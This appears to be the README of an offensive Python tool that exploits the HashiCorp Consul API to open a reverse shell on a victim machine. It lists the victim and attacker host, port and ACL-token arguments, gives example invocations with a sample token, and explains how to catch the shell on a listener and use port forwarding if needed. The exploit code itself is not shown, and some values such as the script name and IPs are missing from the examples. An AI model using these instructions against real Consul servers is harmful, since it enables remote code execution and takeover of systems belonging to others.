This exploit helps you to get a reverse shell, exploiting the Hashicorp-Consul service via API, not using tools like metasploit
· When executing the script with python3 with the --help parameter, it asks us for a series of parameters
--rhost RHOST remote host (ip of the victim machine, if not specified, will be used)
--rport RPORT remote port (port where the consul API is executed, if not specified, 8500 will be used)
--lhost LHOST local host (ip where the shell will be received)
--lport LPORT local port (port where the shell will be received)
--token TOKEN acl token (acl token needed to authenticate with the api)
· If we have what is necessary, we can give it the arguments and run it, example:
python3 --rhost --rport 8500 --lhost --lport 443 --token bb03b43b-1d81-d62b-24b5-39540ee469b5
· or can be compacted with the other argument options
python3 -rh -rp 8500 -lh -lp 443 -tk bb03b43b-1d81-d62b-24b5-39540ee469b5
· When executing the script with its arguments we should see a message with a + which indicates that the request has been sent correctly
· Checking your listener, in a couple of seconds you should get a shell as the user running the service
· In case it detects that it cannot connect to the host, it will give a message, check the port is exposed and use port forwarding if necessary, then try again